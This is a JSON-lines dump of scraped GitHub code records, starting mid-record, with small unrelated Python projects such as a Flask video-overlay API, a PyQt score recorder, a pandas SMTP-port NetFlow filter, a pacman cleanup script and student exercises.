\"__table_prefix__\" in cls.__dict__:\n table_prefix = camel_to_snake_case(cls.__table_prefix__)\n table_name = f\"{table_prefix}{table_name}\"\n cls.__tablename__ = table_name\n\n super().__init__(classname, bases, dict_)\n\n # __table_cls__ has run at this point\n # if no table was created, use the parent table\n if (\n \"__tablename__\" not in cls.__dict__\n and \"__table__\" in cls.__dict__\n and cls.__dict__[\"__table__\"] is None\n ):\n del cls.__table__\n\n def __table_cls__(cls, *args, **kwargs):\n \"\"\"This is called by SQLAlchemy during mapper setup. It determines the\n final table object that the model will use.\n\n If no primary key is found, that indicates single-table inheritance,\n so no table will be created and ``__tablename__`` will be unset.\n \"\"\"\n # check if a table with this name already exists\n # allows reflected tables to be applied to model by name\n key = _get_table_key(args[0], kwargs.get(\"schema\"))\n\n if key in cls.metadata.tables:\n return sa.Table(*args, **kwargs)\n\n # if a primary key or constraint is found, create a table for\n # joined-table inheritance\n for arg in args:\n print(arg)\n if (isinstance(arg, sa.Column) and arg.primary_key) or isinstance(\n arg, sa.PrimaryKeyConstraint\n ):\n return sa.Table(*args, **kwargs)\n\n # if no base classes define a table, return one\n # ensures the correct error shows up when missing a primary key\n for base in cls.__mro__[1:-1]:\n if \"__table__\" in base.__dict__:\n break\n else:\n return sa.Table(*args, **kwargs)\n\n # single-table inheritance, use the parent tablename\n if \"__tablename__\" in cls.__dict__:\n del cls.__tablename__\n\n\nclass DefaultMeta(NameMetaMixin, BindMetaMixin, DeclarativeMeta):\n pass\n\n\nclass Model(object):\n \"\"\"Base class for SQLAlchemy declarative base model.\n\n To define models, subclass :attr:`db.Model `, not this\n class. To customize ``db.Model``, subclass this and pass it as\n ``model_class`` to :class:`SQLAlchemy`.\n \"\"\"\n\n #: Query class used by :attr:`query`. Defaults to\n # :class:`SQLAlchemy.Query`, which defaults to :class:`BaseQuery`.\n query_class = None\n\n #: Convenience property to query the database for instances of this model\n # using the current session. Equivalent to ``db.session.query(Model)``\n # unless :attr:`query_class` has been changed.\n query = None\n\n def __repr__(self):\n identity = inspect(self).identity\n if identity is None:\n pk = \"(transient {})\".format(id(self))\n else:\n pk = \", \".join(str(value) for value in identity)\n return \"<{} {}>\".format(type(self).__name__, pk)\n","repo_name":"alkaemic/philosophy","sub_path":"philosophy/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26259159365","text":"'''\r\n김태환\r\n202395012\r\n문제분석\r\n 주사위를 던져서 나오는 값들의 빈도를 계산하는 프로그램을 작성하시오 1,2,3,4,5,6의 값이 각각 몇번이나 나오는지를 계산\r\n 변수 주사위 (dice)\r\n알고리즘\r\n 랜덤모듈 추가\r\n set변수 생성\r\n 반복\r\n while True:\r\n dice.add(random.randint(1,6))\r\n \r\n'''\r\nimport random\r\ndice=set()\r\ncnt=0\r\none=0\r\ntwo=0\r\nthree=0\r\nfour=0\r\nfive=0\r\nsix=0\r\nwhile True:\r\n dice.add(random.randint(1,6))\r\n cnt=cnt=1\r\n if cnt==1000:\r\n if dice==1:\r\n one=one+1\r\n elif dice==2:\r\n two=two+1\r\n elif dice==3:\r\n three=three+1\r\n elif dice==4:\r\n four=four+1\r\n elif dice==5:\r\n five=five+1\r\n else:\r\n six=six+1\r\n break\r\n \r\nprint(\"주사위가 1인 경우\",one)\r\nprint(\"주사위가 2인 경우\",two)\r\nprint(\"주사위가 3인 경우\",three)\r\nprint(\"주사위가 4인 경우\",four)\r\nprint(\"주사위가 5인 경우\",five)\r\nprint(\"주사위가 6인 경우\",six)\r\n","repo_name":"tkdwk1/SW","sub_path":"sw_fin202395012/fin_ex4_202395012.py","file_name":"fin_ex4_202395012.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10373329226","text":"import wx\nfrom wx import adv\nimport nmx_reporte\n\n\nclass VentanaNmx(wx.Frame):\n\tdef __init__(self, *args, **kw):\n\t\tsuper().__init__(*args, **kw)\n\t\tpnl = wx.Panel(self)\n\t\tst = wx.StaticText(pnl, label=\"Fecha de inicio:\\t\\t\\tNMX179 by FJGO\\t\\t\\tFecha Fin:\", pos=wx.Point(10,10), size=wx.Size(550, 20))\n\t\tself.cal1 = adv.CalendarCtrl(pnl, pos=wx.Point(10,50))\n\t\tself.cal2 = adv.CalendarCtrl(pnl, pos=wx.Point(270,50))\n\t\tbot = wx.Button(pnl, label=\"Iniciar Reporte\", pos=wx.Point(10, 250))\n\t\tself.Bind(wx.EVT_BUTTON, self.OnButton, bot)\n\n\tdef OnButton(self, event):\n\t\tresp = wx.MessageBox(\"Se va a iniciar el proceso\", 'NMX179', wx.YES | wx.NO | wx.ICON_ASTERISK)\n\t\tif resp == wx.NO:\n\t\t\tprint(\"Cancelado\")\n\t\telse:\n\t\t\tfecha_ini = self.cal1.GetDate()\n\t\t\tfecha_fin = self.cal2.GetDate()\n\n\t\t\tif fecha_fin > fecha_ini:\n\t\t\t\tdia_ini = fecha_ini.GetDay()\n\t\t\t\tmes_ini = fecha_ini.GetMonth() + 1 #Se suma uno porque es un dato de base cero\n\t\t\t\tanio_ini = fecha_ini.GetYear()\n\n\t\t\t\tdia_fin = fecha_fin.GetDay()\n\t\t\t\tmes_fin = fecha_fin.GetMonth() + 1 #Se suma uno porque es un dato de base cero\n\t\t\t\tanio_fin = fecha_fin.GetYear()\n\n\t\t\t\tresp = False\n\t\t\t\tresp = nmx_reporte.Inicia_Reporte(dia_ini, mes_ini, anio_ini, dia_fin, mes_fin, anio_fin)\n\t\t\t\tif resp == True:\n\t\t\t\t\twx.MessageBox(\"El reporte ha finalizado.\", style=wx.ICON_ASTERISK)\n\t\t\t\telse:\n\t\t\t\t\twx.MessageBox(\"Se ha producido un error durante el reporte\", style=wx.ICON_ERROR)\n\t\t\telse:\n\t\t\t\twx.MessageBox(\"Las fecha final debe de ser mayor a fecha de inicio.\", style=wx.ICON_EXCLAMATION)\n\ndef IniciaVentana():\n\tapp = wx.App()\n\tfrm = VentanaNmx(None, title = \"NMX179 by FJGO\", size=wx.Size(550,350))\n\tfrm.Show()\n\tapp.MainLoop()","repo_name":"frankone11/NMX179","sub_path":"nxm_ventana.py","file_name":"nxm_ventana.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25892227228","text":"\n# from django.contrib import admin\nfrom django.urls import path\nfrom .views import index, by_rubric, BbCreateView, add, add_save\n# app_name = 'bboard'\nurlpatterns = [\npath ('/', by_rubric, name='by_rubric'),\npath ('', index, name='index'),\npath ('add/', BbCreateView.as_view(), name='add'),\npath ('add/ save/ ', add_save, name='add_save'),\npath ('add/', add, name='add'),\n\n]\n","repo_name":"NETsharing/DjangoDronov","sub_path":"bboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7772532492","text":"#!/usr/bin/python3\n\"\"\"\ntakes in a URL and an email, sends a POST request to the passed URL\nwith the email as a parameter, and displays the body of the\nresponse (decoded in utf-8)\n\"\"\"\nfrom sys import argv\nimport urllib.request as req\nimport urllib.parse as parse\n\nif __name__ == \"__main__\":\n url = argv[1]\n values = {'email': argv[2]}\n email = parse.urlencode(values).encode(\"ascii\")\n\n request = req.Request(url, email)\n with req.urlopen(request) as response:\n page = response.read()\n print(page.decode(\"utf-8\"))\n","repo_name":"haru-voster/alx-higher_level_programming","sub_path":"0x11-python-network_1/2-post_email.py","file_name":"2-post_email.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"17293389200","text":"import sys\nimport pickle\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\n\nclass Ass():\n def __init__(self):\n super().__init__()\n\n def hi(self,lv,s,la):\n global level,score,lang\n level = lv\n score = s\n lang = la\n\nclass LogInDialog(QDialog):\n def __init__(self):\n super().__init__()\n self.setupUI()\n self.name = None\n\n def setupUI(self):\n self.setGeometry(1100, 200, 300, 100)\n self.setWindowTitle(\"Sign In\")\n\n label1 = QLabel(\"UserName: \")\n\n self.lineEdit1 = QLineEdit()\n self.pushButton1= QPushButton(\"Add\")\n self.pushButton1.clicked.connect(self.pushButtonClicked)\n\n layout = QGridLayout()\n layout.addWidget(label1, 0, 0)\n layout.addWidget(self.lineEdit1, 0, 1)\n layout.addWidget(self.pushButton1, 0, 2)\n\n self.setLayout(layout)\n\n def pushButtonClicked(self):\n self.name = self.lineEdit1.text()\n self.close()\n\nclass MyWindow(QWidget):\n def __init__(self):\n super().__init__()\n self.setupUI()\n self.dbfilename = 'hihihi'\n self.scoredb = []\n self.readScoreDB()\n self.showScoreDB()\n\n def setupUI(self):\n self.setGeometry(800, 200, 300, 300)\n self.setWindowTitle(\"Records\")\n self.pushButton = QPushButton(\"Register\")\n self.pushButton.clicked.connect(self.pushButtonClicked)\n self.label = QLabel()\n\n layout = QVBoxLayout()\n layout.addWidget(self.pushButton)\n layout.addWidget(self.label)\n\n self.setLayout(layout)\n\n def pushButtonClicked(self):\n dlg = LogInDialog()\n dlg.exec_()\n name = dlg.name\n result = {'Name' : 'leejung', 'Language' : 'korr', 'Level' : 'expert', 'Score': 77}\n self.scoredb += [result]\n self.showScoreDB()\n\n def showScoreDB(self):\n keyname = 'Score'\n msg = ''\n result = {'Name': 'leejung', 'Language': 'korr', 'Level': 'expert', 'Score': 77}\n self.scoredb4=[]\n self.scoredb4 += [result]\n for p in sorted(self.scoredb4, key=lambda person: person[keyname]):\n for attr in p:\n msg += attr + \" : \" + str(p[attr]) + \" , \"\n msg += \"\\n\"\n self.label.setText(msg)\n self.writeScoreDB()\n def readScoreDB(self):\n try:\n fH = open(self.dbfilename, 'rb')\n except FileNotFoundError as e:\n self.scoredb4 = []\n return\n\n try:\n self.scoredb = pickle.load(fH)\n except:\n pass\n else:\n pass\n fH.close()\n\n\n # write the data into person db\n def writeScoreDB(self):\n fH = open(self.dbfilename, 'wb')\n pickle.dump(self.scoredb4, fH)\n fH.close()\n\n","repo_name":"JungHyun4/DooDooDooDoo","sub_path":"record_test.py","file_name":"record_test.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41215126277","text":"from app import app\r\nfrom flask import render_template\r\nfrom utils import get_db_connection\r\nfrom models.profile_model import *\r\nfrom models.event_model import get_event_info, get_participants, get_user_events_only_id\r\nfrom controllers.functions import *\r\n\r\n\r\n@app.route('/profile', methods=['GET', 'POST'])\r\ndef profile():\r\n conn = get_db_connection()\r\n\r\n # Начальная инициализация параметров\r\n rate_window = False\r\n event_id = 0\r\n\r\n # Начальная инициализация session\r\n if 'status_user' not in session:\r\n session['status_user'] = []\r\n\r\n # Отмена регистрации пользователя на мероприятии\r\n if request.values.get('cancel'):\r\n event_id = int(request.values.get('cancel'))\r\n to_cancel(conn, session['user_id'], event_id)\r\n\r\n # Оценка мероприятия пользователя\r\n elif request.values.get('to_rate'):\r\n session['remember_id_'] = int(request.values.get('to_rate'))\r\n rate_window = True\r\n\r\n # Просмотр подробной информации о мероприятии\r\n elif request.values.get('choice_event'):\r\n event_id = int(request.values.get('choice_event'))\r\n\r\n # Отправка отзыва о мероприятии\r\n if request.values.get('to_rate_event'):\r\n rate_box = request.values.get('rate_box')\r\n rate_text = request.values.get('rate_text')\r\n rate = \"Оценка: \" + rate_box + \" Комментарий: \" + rate_text\r\n if 'remember_id_' in session:\r\n to_rate(conn, session['remember_id_'], rate, session['user_id'])\r\n session.pop('remember_id_', None)\r\n\r\n # Очистка фильтров поиска\r\n if request.form.get('clear'):\r\n status = []\r\n session['status_user'] = []\r\n else:\r\n status = request.form.getlist(\"Статус мероприятия\")\r\n\r\n # Поиск мероприятий по фильтрам\r\n if request.form.get('search'):\r\n session['status_user'] = status\r\n\r\n df_status = get_status(conn, session['user_id'])\r\n df_event = get_user_events(conn, session['user_id'])\r\n event_info = get_event_info(conn, event_id)\r\n df_participants = get_participants(conn)\r\n df_event = df_event[((df_event['status_name'].isin(session['status_user'])) | (len(session['status_user']) == 0))]\r\n\r\n # Способы сортировки\r\n title = request.values.get('select-list')\r\n if title == 'Отсортировать по алфавиту ↓':\r\n sort = 'event_name DESC'\r\n df_event = get_user_events_sort(conn, session['user_id'], sort)\r\n elif title == 'Отсортировать по алфавиту ↑':\r\n sort = 'event_name'\r\n df_event = get_user_events_sort(conn, session['user_id'], sort)\r\n elif title == 'Отсортировать по дате ↓':\r\n sort = 'strftime(\"%Y-%m-%d\", beginning_date) DESC'\r\n df_event = get_user_events_sort(conn, session['user_id'], sort)\r\n elif title == 'Отсортировать по дате ↑':\r\n sort = 'strftime(\"%Y-%m-%d\", beginning_date)'\r\n df_event = get_user_events_sort(conn, session['user_id'], sort)\r\n elif title == 'Отсортировать по статусу ↓':\r\n sort = 'status_id DESC'\r\n df_event = get_user_events_sort(conn, session['user_id'], sort)\r\n elif title == 'Отсортировать по статусу ↑':\r\n sort = 'status_id'\r\n df_event = get_user_events_sort(conn, session['user_id'], sort)\r\n elif title == 'Рекомендуемая сортировка':\r\n df_event = get_user_events(conn, session['user_id'])\r\n\r\n df_user_event = get_user_events_only_id(conn, session['user_id']).values.tolist()\r\n\r\n list_title = init_list_title()\r\n\r\n html = render_template(\r\n 'profile.html',\r\n events=df_event,\r\n status_list=df_status,\r\n rate_window=rate_window,\r\n event_info=event_info,\r\n participants_list=df_participants,\r\n len=len,\r\n title=title,\r\n user_event_list=df_user_event,\r\n list_title=list_title\r\n )\r\n\r\n return html\r\n","repo_name":"NiShiGara/SIT-general-lab-maintenance","sub_path":"controllers/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":4254,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34317371615","text":"'''\nFor UGS Data, filter SMTP related records\nport 25, 587, 465\n'''\n\nimport pandas as pd\nimport argparse\n\nparser = argparse.ArgumentParser(description = \"Filters SMTP related records from UGR Netflow data\")\nparser.add_argument('-f', metavar='filename', type=str, help='path to csv file')\nparser.add_argument('-o', metavar='filename', type=str, help='path to out csv file')\nargs = parser.parse_args()\n\nfilename = vars(args)['f']\noutname = vars(args)['o']\nSMTP_ports = [25, 587, 465]\n\nchunksize = 10 ** 6\ndf = None\ncounter = 0\nfor chunk in pd.read_csv(filename, chunksize=chunksize):\n\tchunk = chunk[(chunk['sp'].isin(SMTP_ports)) | (chunk['dp'].isin(SMTP_ports))]\n\tif df is None:\n\t\tdf = chunk\n\telse:\n\t\tdf = df.append(chunk) \n\tcounter += 1\n\tprint(\"[+] {} chunks read\".format(counter))\ndf.to_csv(outname, index=False)","repo_name":"raynoldng/UGR_Experiments","sub_path":"utils/filter_SMTP_csv.py","file_name":"filter_SMTP_csv.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1992661215","text":"import os\n\nimport pytest\n\nfrom db2docker.backends.base import DBDockerBackend\nfrom db2docker.db2d import db2d\n\n\nclass DummyDBDockerBackend(DBDockerBackend):\n\n called = False\n\n def run(self):\n DummyDBDockerBackend.called = True\n\n\ndef test_db2d(mocker, tmpdir):\n assert list(db2d.types.keys()) == [\"mariadb\"]\n\n db2d.register(\"dummy\", DummyDBDockerBackend)\n assert sorted(db2d.types.keys()) == [\"dummy\", \"mariadb\"]\n\n foodir = tmpdir.mkdir(\"foo\")\n sqlfile = os.path.join(str(foodir), \"bar.sql\")\n\n with open(sqlfile, \"w\") as f:\n f.write(\"some sql\")\n db2d.run(sqlfile, \"--container-type=dummy\", \"--data=/some/data\")\n assert DummyDBDockerBackend.called is True\n\n with pytest.raises(SystemExit):\n db2d.run(sqlfile, \"--container-type=DOESNOTEXIST\", \"--data=/some/data\")\n","repo_name":"phlax/db2docker","sub_path":"tests/db2d.py","file_name":"db2d.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24327946411","text":"\nimport torch\nfrom torch.nn import L1Loss\nfrom torch import nn\n\ninputs = torch.tensor([1, 2, 3], dtype=torch.float32)\ntargets = torch.tensor([1, 2, 5], dtype=torch.float32)\n\nprint(\"inputs\", inputs)\nprint(\"targets: \", targets)\n\ninputs = torch.reshape(inputs, (1, 1, 1, 3))\ntargets = torch.reshape(targets, (1, 1, 1, 3))\n\nloss = L1Loss()\nresult = loss(inputs, targets)\nprint(\"LOSS-mean \", result)\n\nloss = L1Loss(reduction='sum')\nresult = loss(inputs, targets)\nprint(\"LOSS-sum\", result)\n\nloss_mse = nn.MSELoss()\nresult = loss_mse(inputs, targets)\nprint(\"LOSS-MSE\", result)\n\nx = torch.tensor([0.1, 0.2, 0.3])\ny = torch.tensor([1])\nx = torch.reshape(x, (1, 3))\nloss_cross = nn.CrossEntropyLoss()\nresult_cross = loss_cross(x, y)\nprint(\"LOSS-cross\", result_cross)\n","repo_name":"yubaoliu/AIDevLib","sub_path":"Pytorch/test/nn_loss.py","file_name":"nn_loss.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29144563660","text":"from marshmallow import Schema, validates_schema, ValidationError\nfrom marshmallow.fields import String, Integer, Boolean, List\nfrom marshmallow.validate import Regexp\n\n\nclass BaseSchema(Schema):\n pub_connect_uri = String(\n missing='tcp://127.0.0.1:7700',\n validate=Regexp('^tcp://[^:]+:\\d+'))\n sub_connect_uri = String(\n missing='tcp://127.0.0.1:7701',\n validate=Regexp('^tcp://[^:]+:\\d+'))\n loglevels = List(String())\n\n\nclass PinSchema(BaseSchema):\n pin = Integer(required=True)\n\n\nclass ProxySchema(BaseSchema):\n pub_bind_uri = String(\n required=True,\n missing='tcp://127.0.0.1:7700',\n validate=Regexp('^tcp://[^:]+:\\d+'))\n sub_bind_uri = String(\n required=True,\n missing='tcp://127.0.0.1:7701',\n validate=Regexp('^tcp://[^:]+:\\d+'))\n\n\nclass KeypadSchema(BaseSchema):\n device = String()\n device_name = String()\n grab = Boolean(missing=True)\n\n @validates_schema\n def validate_device(self, data):\n if all(data.get(option) is None\n for option in ['device', 'device_name']):\n raise ValidationError('you must provide device '\n 'or device_name')\n\n\nclass PasscodeSchema(BaseSchema):\n keypad_instance = String()\n timeout = Integer(missing=10)\n\n\nclass MetricsSchema(BaseSchema):\n host = String(missing='localhost')\n port = Integer(missing=8086)\n database = String(required=True)\n\n\nclass ActivitySchema(BaseSchema):\n interval = Integer(missing=10)\n extend = Integer(missing=10)\n limit = Integer(missing=120)\n cooldown = Integer(missing=30)\n\n\nclass MessagesSchema(BaseSchema):\n subscription = List(String())\n\n\nclass LedSchema(PinSchema):\n subscription = String(required=True)\n\n\nclass ControllerSchema(BaseSchema):\n passcode = String()\n passcode_instance = String()\n arm = Boolean(missing=False)\n mute = Boolean(missing=False)\n statefile = String()\n buzzer_pwm = String(missing='pwmchip0:0')\n arm_hotkey = String(\n validate=Regexp('([^:]+:)?KEY_.*'))\n\n\nclass PathSchema(BaseSchema):\n datadir = String(missing='.')\n\n\nclass CameraSchema(BaseSchema):\n res_hi_x = Integer(missing=800)\n res_hi_y = Integer(missing=600)\n res_lo_x = Integer(missing=320)\n res_lo_y = Integer(missing=240)\n res_image_x = Integer(missing=800)\n res_image_y = Integer(missing=600)\n framerate = Integer(missing=30)\n flip_x = Boolean(missing=False)\n flip_y = Boolean(missing=False)\n image_interval = Integer(missing=2)\n\n hires_bind_uri = String(\n missing='tcp://*:7710',\n validate=Regexp('^tcp://[^:]+:\\d+'))\n lores_bind_uri = String(\n missing='tcp://*:7711',\n validate=Regexp('^tcp://[^:]+:\\d+'))\n image_bind_uri = String(\n missing='tcp://*:7712',\n validate=Regexp('^tcp://[^:]+:\\d+'))\n\n\nclass RecordSchema(PathSchema):\n hires_connect_uri = String(\n missing='tcp://localhost:7710',\n validate=Regexp('^tcp://[^:]+:\\d+'))\n lores_connect_uri = String(\n missing='tcp://localhost:7711',\n validate=Regexp('^tcp://[^:]+:\\d+'))\n image_connect_uri = String(\n missing='tcp://localhost:7712',\n validate=Regexp('^tcp://[^:]+:\\d+'))\n\n framebuffer = Integer(missing=30)\n","repo_name":"larsks/zcam","sub_path":"zcam/schema/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42019568005","text":"#!/usr/bin/env python\n\nimport os,re, datetime\nd = '/var/lib/pacman/local'\n\npackages = os.listdir(d)\npackages.sort()\n\npkgname_search = re.compile('^(.*?)-[0-9]')\n\nold_packages = []\n\nfor pkg1 in packages:\n if pkg1 in old_packages:\n continue\n \n #get package name\n \n if not pkgname_search.findall(pkg1):\n print(pkg1 + \" .... skip\")\n continue\n pkgname = pkgname_search.findall(pkg1)[0]\n \n #look for other items with the same package name\n for pkg2 in packages:\n if pkg2 == pkg1:\n continue\n if pkg2 in old_packages:\n continue\n if not pkgname_search.findall(pkg2):\n print(pkg2 + \" .... skip\")\n continue\n if pkgname == pkgname_search.findall(pkg2)[0]:\n # We now have two duplicate packages, we want to delete the old one\n \n old_package = pkg1\n path1 = os.path.join(d,pkg1)\n path2 = os.path.join(d,pkg2)\n if os.stat(path1).st_mtime > os.stat(path2).st_mtime:\n old_package = pkg2\n \n old_packages.append(old_package)\n #print ('duplicate found:\\t')\n #print (pkg1)\n #print (pkg2)\n #print ('old:', old_package)\n \n oldpath = os.path.join(d,old_package)\n target = os.path.join('/var/lib/pacman/OLD',old_package)\n cmd = 'mv \"%s\" \"%s\"' % (oldpath, target)\n \n #double-check that the oldpath still exists (it may have been removed in a previous pass)\n if os.path.exists(oldpath):\n print(cmd)\n os.system(cmd)\n","repo_name":"sk1418/myConf","sub_path":"YK-Arch/bin/rmDupPacman.py","file_name":"rmDupPacman.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"31"} +{"seq_id":"73332127449","text":"import random\n\npoem = \"\"\"\nI have half my father's face\n& not a measure of his flair\nfor the dramatic. Never once\nhave I prayed & had another man's wife\nwail in return.\n\"\"\"\n \nlist_of_lines = poem.split(\"\\n\")\n\n# Your code should implement the lines_printed_backwards() function. \n# This function takes in a list of strings containing the lines of your \n# poem as arguments and will print the poem lines out in reverse with the line numbers reversed. \n\ndef lines_printed_backwards(list_of_lines):\n for lines in list_of_lines:\n list_of_lines.reverse()\n print(list_of_lines)\n\ndef lines_printed_random(list_of_lines):\n \"\"\"Your code should implement the lines_printed_random() function which will randomly select lines from a list of strings and print them out in random order. Repeats are okay and the number of lines printed should be equal to the original number of lines in the poem (line numbers don't need to be printed). Hint: try using a loop and randint()\"\"\"\n\n for lines in list_of_lines:\n print(random.choice(list_of_lines))\n\ndef my_costum_function(list_of_lines):\n \"\"\"\"Your code should implement a function of your choice that rearranges the poem in a unique way, be creative! Make sure that you carefully comment your custom function so it's clear what it does.\"\"\"\n # IT's going to delete the last line\n for lines in list_of_lines:\n list_of_lines.pop()\n print(list_of_lines)\n\nlines_printed_backwards(list_of_lines)\nlines_printed_random(list_of_lines)\nmy_costum_function(list_of_lines)\n","repo_name":"stark276/Backwards-Poetry","sub_path":"poetry.py","file_name":"poetry.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8328041528","text":"from http import HTTPStatus\nfrom flask import Blueprint, Flask, flash, request, redirect, url_for, send_file, send_from_directory, jsonify\nfrom flask.helpers import make_response\nfrom flasgger import swag_from\nfrom api.model.video import VideoModel\nfrom api.schema.video import VideoSchema\nfrom config import publicdir\nfrom controllers.ffmpeg_controller import FFMPEGController\nfrom datetime import datetime \n\nimport os\n\nvideo_api = Blueprint('video', __name__)\n\n@video_api.route('/saveFiles', methods=['POST'])\ndef saveFiles():\n video_file = request.files['video']\n video_file_ext = video_file.filename.split('.')[-1]\n video_file_name = datetime.now().strftime(\"%H:%M:%S\") + \"videofile.\" + video_file_ext\n video_file.save(os.path.join(publicdir, video_file_name))\n\n image_file = request.files['image']\n image_file_ext = image_file.filename.split('.')[-1]\n image_file_name = datetime.now().strftime(\"%H:%M:%S\") + \"imgfile.\" + image_file_ext\n image_file.save(os.path.join(publicdir, image_file_name))\n\n paths = {\n 'image_name' : image_file_name,\n 'video_name' : video_file_name\n }\n \n return jsonify(paths)\n\n@video_api.route('/getVideoFile', methods=['POST'])\ndef getVideoFile():\n videoName = request.form['videoName']\n return send_from_directory(publicdir, path=videoName, as_attachment=True)\n\n@video_api.route('/overlayImage', methods=['POST'])\ndef overlayImage():\n \"\"\"\n 1 liner about the route\n A more detailed description of the endpoint\n \"\"\"\n ffmpeg = FFMPEGController() \n\n image_file = request.files['image']\n video_file = request.files['video']\n positionX = request.form['positionX'] \n positionY = request.form['positionY'] \n\n image_file.save(os.path.join(publicdir, image_file.filename))\n video_file.save(os.path.join(publicdir, video_file.filename))\n\n #position image return url with created video\n final_video_filename = ffmpeg.overlayImage(publicdir + video_file.filename, publicdir + image_file.filename, positionX, positionY)\n return send_from_directory(publicdir, path=final_video_filename, as_attachment=True)\n\n\n@video_api.route('/createTemplateVideo', methods=['POST'])\ndef createTemplateVideo():\n ffmpeg = FFMPEGController() \n\n image_file = request.files['image']\n video_file = request.files['video']\n\n positionX = float(request.form['positionX']) \n positionY = float(request.form['positionY']) \n componentHeight = float(request.form['height'])\n componentWidth = float(request.form['width'])\n\n image_file.save(os.path.join(publicdir, image_file.filename))\n video_file.save(os.path.join(publicdir, video_file.filename))\n\n #position image return url with created video\n final_video_filename = ffmpeg.positionVideoInsideImage(\n publicdir + video_file.filename, publicdir + \n image_file.filename, \n positionX, \n positionY,\n componentHeight,\n componentWidth\n )\n \n return send_from_directory(publicdir, path=final_video_filename, as_attachment=True)\n\n \n@video_api.route('/test', methods=[\"GET\"])\ndef test():\n \"\"\"\n API routing test\n \"\"\"\n\n result = VideoModel(\"path_to_video\")\n return VideoSchema().dump(result), 200\n\n","repo_name":"somaestrategias/gdartes-videos","sub_path":"api/route/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33588215007","text":"from google.appengine.ext import db\n\nimport hashlib\nimport simplejson\nimport settings\n\nclass Activity(db.Model):\n '''\n Key - id\n '''\n id = db.StringProperty()\n shortcut = db.StringProperty()\n username = db.StringProperty()\n data = db.TextProperty()\n title = db.StringProperty()\n last_updated = db.DateTimeProperty(auto_now = True)\n url = db.StringProperty()\n replies_url = db.StringProperty()\n likes_url = db.StringProperty()\n \n @staticmethod\n def Get(*args, **kwargs):\n q = db.Query(Activity)\n \n \n # build the filter dynamically, have to watch out for index errors.\n for key in kwargs:\n if key in settings.FILTER_MAP:\n newKey = settings.FILTER_MAP[key]\n q = q.filter(\"%s =\" % newKey, kwargs[key])\n \n return q.get()\n \n @staticmethod\n def Put(activity):\n \n m = hashlib.md5()\n m.update(activity[\"id\"])\n key = m.hexdigest()\n \n data = {\n \"id\" : activity[\"id\"],\n \"username\": activity[\"actor\"][\"profileUrl\"],\n \"shortcut\" : key,\n \"title\": activity[\"title\"],\n \"data\" : simplejson.dumps(activity),\n \"url\" : activity[\"links\"][\"self\"][0][\"href\"].replace(\"alt=json\", \"\"),\n \"replies_url\" : activity[\"links\"][\"replies\"][0][\"href\"].replace(\"alt=json\", \"\"),\n \"likes_url\" : activity[\"links\"][\"liked\"][0][\"href\"].replace(\"alt=json\", \"\")\n }\n \n act = Activity.get_or_insert(key_name = key, **data)\n ","repo_name":"PaulKinlan/commently","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"40096185808","text":"from flask_sqlalchemy import SQLAlchemy\nfrom random import randint\n\ndb = SQLAlchemy()\n\n#Clase familia\nclass FamilyStructure(db.Model): \n id = db.Column(db.Integer, primary_key=True)\n first_name = db.Column(db.String(120), unique=True, nullable=False)\n last_name = db.Column(db.String(120), unique=True, nullable=False)\n age = db.Column(db.Integer, nullable=False)\n lucky_numbers = db.Column(db.String(120), nullable=False)\n \n\n def __init__(self, last_name): \n self.last_name = last_name\n\n #Ejmplo de lista de miembros\n self._members = [\n {\n \"id\": self._generateId(),\n \"first_name\": \"Esmeralda\",\n \"last_name\": last_name,\n \"age\": '41',\n \"lucky_numbers\": [98, 2, 78]\n },\n {\n \"id\": self._generateId(),\n \"first_name\": \"Yocksan\",\n \"last_name\": last_name,\n \"age\": '16',\n \"lucky_numbers\": [90, 46, 48]\n },\n {\n \"id\": self._generateId(),\n \"first_name\": \"Elena\",\n \"last_name\": last_name,\n \"age\": '65',\n \"lucky_numbers\": [78, 22, 13]\n },\n {\n \"id\": self._generateId(),\n \"first_name\": \"Gerson\",\n \"last_name\": last_name,\n \"age\": '25',\n \"lucky_numbers\": [17, 26, 47]\n },\n {\n \"id\": self._generateId(),\n \"first_name\": \"Carmen\",\n \"last_name\": last_name,\n \"age\": '30',\n \"lucky_numbers\": [78, 43, 11]\n },\n {\n \"id\": self._generateId(),\n \"first_name\": \"Deikel\",\n \"last_name\": last_name,\n \"age\": 